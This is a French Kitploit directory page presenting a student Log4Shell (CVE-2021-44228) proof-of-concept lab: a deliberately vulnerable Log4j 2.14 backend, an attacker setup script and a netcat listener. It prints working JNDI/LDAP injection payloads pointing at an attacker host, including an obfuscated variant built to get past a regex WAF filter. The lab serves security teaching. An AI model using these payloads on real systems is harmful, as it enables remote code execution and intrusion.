Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
TPASLog4ShellPoC — Preuve de concept pour la vulnérabilité Log4Shell (CVE-2021-44228), développé dans le cadre du travail de cours pour l'unité curriculaire TPAS du Master en sécurité de l'information à FCUP. | Kitploit
Outils/GitHubGitHub/carlos-mesquita/tpaslog4shellpoc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFApprentissage et ÉducationArchived
GitHubcarlos-mesquita/tpaslog4shellpoc

TPASLog4ShellPoC

Preuve de concept pour la vulnérabilité Log4Shell (CVE-2021-44228), développé dans le cadre du travail de cours pour l'unité curriculaire TPAS du Master en sécurité de l'information à FCUP.

Voir le dépôt
17il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

TPAS Log4Shell PoC

Ce dépôt contient une preuve de concept (PoC) pour la vulnérabilité Log4Shell (CVE-2021-44228), développée dans le cadre du cours de l'unité curriculaire TPAS du Master en Sécurité de l'Information à la FCUP.

Il comprend :

  • Un frontend React SPA qui simule un site e-commerce générique avec des fonctionnalités de base telles que parcourir les produits et voir les détails de base comme la description, le prix, l'évaluation, etc., fourni via l'API JSON factice https://dummyjson.com/docs/products
  • Un backend Spring Boot API REST qui utilise une version vulnérable de Log4j 2.14.
  • Un script bash qui configure la plupart des éléments nécessaires du côté de l'attaquant pour exploiter Log4Shell.

Pour exécuter cette pile, vous avez besoin de :

  • Sur l'hôte cible :
    • Installer docker
    • Remplacer <target_ip> dans la variable d'environnement NEXT_PUBLIC_BACKEND_URL dans docker-compose.yaml
    • Exécuter docker-compose up
  • Sur l'hôte attaquant :
    • Installer Java, Python et Maven
    • Ouvrir les ports requis, "./init.sh --help" pour voir les ports et ce que fait le script
    • Exécuter le script init.sh
    • Exécuter un écouteur netcat, nc -lvnp

Une fois que tout est en cours d'exécution :

Placez cette charge utile dans la barre de recherche (encodée en URL car elle sera dans un paramètre de requête GET) :

root@kitploit:~
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D

Ou placez cette charge utile dans les en-têtes d'une requête (vous pouvez utiliser Burp Suite pour intercepter une requête et la modifier) :

root@kitploit:~
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}

Sur le site web, il y a une icône à côté du nom de l'utilisateur qui permet de basculer entre la désinfection de la chaîne enregistrée en utilisant l'expression régulière \$\{jndi:.*?} ou non. Par défaut, la désinfection est désactivée, représentée par une icône de démon rouge. Lorsque la désinfection est activée, l'icône change en un smiley vert.

Cette fonctionnalité peut être utilisée pour simuler un contournement WAF, vous pouvez ajouter d'autres expressions régulières dans la classe LoggerManager.java du backend.

Voici une charge utile qui ne sera pas détectée par l'expression régulière actuelle :

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
Télécharger l’outil